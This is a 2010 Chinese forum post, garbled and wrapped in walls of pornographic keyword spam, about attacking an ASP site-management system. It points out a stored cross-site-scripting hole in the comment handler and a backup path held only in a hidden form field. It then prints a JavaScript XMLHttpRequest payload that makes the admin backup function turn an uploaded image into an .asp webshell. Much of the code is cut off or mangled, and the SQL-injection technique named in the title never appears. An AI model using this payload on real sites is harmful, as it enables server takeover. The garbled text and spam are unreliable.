久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区


曙海教育集團論壇開發(fā)語言培訓專區(qū)SQL Server數(shù)據(jù)庫 → 利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全


  共有7694人關注過本帖樹形打印

主題:利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全

美女呀,離線,留言給我吧!
wangxinxin
  1樓 個性首頁 | 博客 | 信息 | 搜索 | 郵箱 | 主頁 | UC


加好友 發(fā)短信
等級:青蜂俠 帖子:1393 積分:14038 威望:0 精華:0 注冊:2010-11-12 11:08:23
利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全  發(fā)帖心情 Post By:2010-12-13 13:47:46

前言:
???? 最近上cnzz下載了一套網(wǎng)站管理系統(tǒng),在源碼首頁發(fā)現(xiàn)它,心想cnzz都推薦應該安全性相當不錯了.官方下載最新版本本地搭建IIS測試發(fā)現(xiàn)簡潔易用,整體上安全做得不錯.由于是免費版的,可能官方有點放水.不過這里不影響我們的分析,這里討論兩個方面:跨站的利用,SQL注射.還是一句話:重在思路.
一.隱藏的數(shù)據(jù)庫
分析代碼經(jīng)常要用到數(shù)據(jù)庫(我分析的是Access版本的) ,習慣性的打開數(shù)據(jù)庫,驚奇的發(fā)現(xiàn)只有一個notdown表,如圖01:
  
可是再仔細查看代碼發(fā)現(xiàn)不應該只有這張表的,于是就想是不是隱藏起來了?第一次看到這種情況,于是就查看了下Access幫助說明,在其中發(fā)現(xiàn)原來有還存在兩種屬性的數(shù)據(jù)表,即系統(tǒng)對象和隱藏對象.下面做一個小知識補充:
由于Access默認是不顯示系統(tǒng)對象和隱藏對象的.所以如果一個表中存在隱藏對象或者系統(tǒng)對象那么就無法看到該表了. 簡單說下隱藏方法,設計好表后右擊表選擇"屬性"->"隱藏"屬性打勾,刷新下就看不到了,這樣就是隱藏對象了,默認是看不到的.至于系統(tǒng)對象,我們可以修改表的前綴為 usys,這樣就可以把表改成一個系統(tǒng)對象.這兩種方法都可以.
既然可以隱藏當然也可以恢復顯示了, 按如下操作:“工具”菜單->“選項”命令->“視圖”選項卡->選中“顯示”一欄下的“系統(tǒng)對象”復選框或者"隱藏對象"復選框,并按下“確定”按鈕,就可以重新顯示所有表了.如圖02
  
Ok了,數(shù)據(jù)就可以和正常的一樣了.
二.跨站的深入利用雞肋
首先看看漏洞文件/include/PlS.asp,查看代碼發(fā)現(xiàn)是一個評論顯示,在多個文件被包含了,代碼如下:  
"" then
??????Dim Author,Content,mycode
????Author=Trim(Request.Form("Author"))// 簡單的過濾空格
????Content=Trim(Request.Form("Content")) //同上
????mycode = trim(request.form("code"))
??????if Author="" or Content="" then
??????Call Alert ("請?zhí)顚懲暾偬峤?amp;quot;,"-1")
????end if
????if mycodeSession("getcode") then
?????? Call Alert ("您輸入驗證碼錯誤","-1")
????end if
??????set rs = server.CreateObject ("adodb.recordset")
????sql="select * from zhi_rui_E_Pl"
????rs.open sql,conn,1,3
????rs.addnew
????rs("cli")=Request.Form("cli")
????rs("Ioid")=request.Form("Inid")
????rs("Author")=Author
????rs("Content")=Content
??------------------------省略部分代碼-------------------------------
%>

顯然沒有任何過濾,直接寫入數(shù)據(jù)庫,跨站產(chǎn)生了.由于數(shù)據(jù)庫是mdb格式的,所有插馬也沒用.這里就想到了是否可以備份數(shù)據(jù)庫?進入后臺看到數(shù)據(jù)庫備份,查看如圖03:
  
看到了沒,據(jù)庫路徑和備份文件名都不能修改,有些朋友可能就到這里停止,其實不然,還可以繼續(xù),經(jīng)驗告訴我,他是將該輸入框?qū)懗蒱idden隱藏域了,查看文件/admin/Admin_Data.asp代碼如下:  
" size="40" />[/td]

看到這行type=hidden,猜測沒錯.那也就是說同樣可以備份任意文件了.所有后臺拿shell比較簡單了.(插馬備份數(shù)據(jù)庫比較麻煩,要繞過// 判斷瀏覽器類型并定義創(chuàng)建xmlhttp會話
if (window.XMLHttpRequest)
{
??xmlhttp = new XMLHttpRequest();
} else if (window.ActiveXObject)
{
??try
??{
????xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
??}
??catch (e)
??{
????try
????{
??????xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
????}
????catch (e)
????{
????}
??}
}
function backup()
{
??var postStr = "DBpath=upload/2009082150598817.jpg&bkfolder=../DataBase/bak/&bkDBname=l4nk0r.asp";
??xmlhttp.open(&quot圖片點擊可在新窗口打開查看OST","/admin/Admin_data.asp?action=RestoreData&act=Restore",true);
??xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
??xmlhttp.send(postStr);
}
Backup();

然后在你要提交的地方提交

支持(0中立(0反對(0單帖管理 | 引用 | 回復 回到頂部

返回版面帖子列表

利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全








簽名
久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区
国产乱码精品一区二区三区五月婷| 天堂资源在线中文精品| 日韩一卡二卡三卡| 欧美久久高跟鞋激| 日韩精品一区二区三区老鸭窝| 欧美一区二区三区免费| 精品国产亚洲在线| 国产欧美日韩不卡免费| 成人性色生活片| 成人的网站免费观看| 99porn视频在线| 欧美精品一区二区三区在线看午夜| 久久综合九色综合久99| 在线视频精品一区| 欧美日韩免费一区二区三区| 欧美一区二区三区人| 久久精品日产第一区二区三区高清版 | 黑人另类av| 欧美日韩无遮挡| 在线观看亚洲精品视频| 久久亚洲综合色一区二区三区| 亚洲精选视频免费看| 久久国产夜色精品鲁鲁99| 成人av电影在线网| 久久久一本精品99久久精品66| 在线视频中文字幕一区二区| wwwwxxxxx欧美| 亚洲第一成人在线| 成人精品免费看| 欧美18视频| 欧美一区二区三区色| 亚洲三级电影网站| 国产在线播放一区| 国外成人在线视频网站| 在线观看日韩av先锋影音电影院| 欧美精品一区二区三区在线 | 欧美极品少妇xxxxⅹ高跟鞋| 亚洲777理论| 成人av电影在线观看| 少妇特黄a一区二区三区| 欧美日韩国产乱码电影| 亚洲欧美另类小说视频| 国产乱淫av一区二区三区| 久久人人97超碰人人澡爱香蕉| 欧美精品日日鲁夜夜添| 亚洲精品免费看| aaa国产一区| 91黄色在线观看| 综合亚洲深深色噜噜狠狠网站| 韩国三级电影一区二区| 日本亚洲自拍| 国产婷婷色一区二区三区| 捆绑紧缚一区二区三区视频| 精品久久sese| 成人爽a毛片一区二区免费| 欧美一级日本a级v片| 久久综合久久综合亚洲| 九一九一国产精品| 欧美尤物一区| 中文字幕中文乱码欧美一区二区| 懂色av一区二区在线播放| 一区二区三区av在线| 国产精品久久久久久久久免费桃花| 国产精品888| 色呦呦国产精品| 伊人婷婷欧美激情| 国产精品三区四区| 欧美变态tickling挠脚心| 美女精品一区二区| 热舞福利精品大尺度视频| 国产网红主播福利一区二区| 高清成人在线观看| 欧美日韩三级在线| 性感美女久久精品| 久久久久久久久久久久久9999| 亚洲精品一区二区在线观看| 国产乱码精品一区二区三区av| 综合视频在线观看| 亚洲久本草在线中文字幕| 国产二区一区| 国产99视频精品免费视频36| 制服丝袜成人动漫| 韩国av一区二区三区| 色偷偷久久一区二区三区| 一区二区不卡在线播放| 鲁丝一区鲁丝二区鲁丝三区| 欧美精彩视频一区二区三区| 91丝袜呻吟高潮美腿白嫩在线观看| 日韩欧美一区二区三区在线| 国内精品不卡在线| 91精品国产欧美日韩| 精品亚洲国内自在自线福利| 欧美无乱码久久久免费午夜一区| 亚洲图片自拍偷拍| 无码免费一区二区三区免费播放| 亚洲一卡二卡三卡四卡| 日本不卡一区| 亚洲一区二区视频在线| 四虎永久在线精品免费一区二区| 一区二区三区欧美日韩| 精品视频一区在线| 亚洲精品乱码久久久久久黑人| 精品欧美国产一区二区三区不卡| 国产精品久久久久久久久晋中| 444亚洲人体| 最新高清无码专区| 欧美午夜精品久久久久免费视| 一区二区欧美精品| 亚洲va韩国va欧美va精四季| 婷婷国产在线综合| 欧美色欧美亚洲另类二区| 国产精品一区不卡| 欧美不卡一区二区三区四区| 97成人超碰视| 欧美激情一区二区三区蜜桃视频 | 久久久一区二区| 国产精品久久久久久久天堂第1集| 国产精品三级视频| 欧美日韩精品久久| 日本中文字幕一区| 91精品国产美女浴室洗澡无遮挡| 国产精品1区2区3区| 久久综合色之久久综合| 九9re精品视频在线观看re6| 亚洲一区二区三区美女| 欧美日韩国产综合一区二区| 国产99久久久精品| 中日韩av电影| 一道本成人在线| 91在线观看成人| 亚洲 欧美综合在线网络| 在线观看91视频| 成人黄色软件下载| 亚洲精品免费播放| 欧美午夜电影在线播放| 99久久免费精品| 一区二区三区四区国产精品| 一本大道久久a久久精品综合| 激情六月婷婷久久| 久久精品亚洲精品国产欧美kt∨| 另类视频在线观看+1080p| 麻豆国产精品官网| 久久久久久久久岛国免费| 无遮挡亚洲一区| 成人午夜视频福利| 亚洲精品免费在线| 91精品国产一区二区三区| 精品久久久久久中文字幕动漫| 日韩激情一二三区| 久久精品欧美一区二区三区麻豆| 亚洲欧美国产一区二区| 91丨porny丨国产| 蜜桃av一区二区在线观看| 国产免费观看久久| 欧美这里有精品| 久久资源亚洲| 岛国av在线一区| 五月婷婷久久综合| 亚洲国产精品二十页| 欧美高清视频一二三区 | 懂色av一区二区三区免费看| 一区二区三区影院| 精品国产自在久精品国产| 一区二区三区av在线| 91免费视频大全| 久久97超碰色| 亚洲精品中文字幕在线观看| 日韩久久久精品| 一本大道av一区二区在线播放| 99三级在线| 看电视剧不卡顿的网站| |精品福利一区二区三区| 日韩三级在线免费观看| 一区二区三区电影| 99re视频在线观看| 国产成人在线影院| 日韩av高清在线观看| 亚洲男女毛片无遮挡| 精品成人私密视频| 欧美一区二区人人喊爽| 一区二区三区在线视频111| 国产日韩一区二区| av在线不卡电影| 国产精品自在在线| 婷婷国产v国产偷v亚洲高清| 国产精品黄色在线观看| 欧美不卡激情三级在线观看| 欧美性猛片aaaaaaa做受| 新呦u视频一区二区| 久草一区二区| 国产99在线播放| 成人性生交大片| 国产麻豆精品在线观看| 天天影视涩香欲综合网| 亚洲国产综合在线| 亚洲人成小说网站色在线| 国产精品国产三级国产aⅴ中文| 久久久99久久| 国产亚洲制服色| 国产日韩成人精品|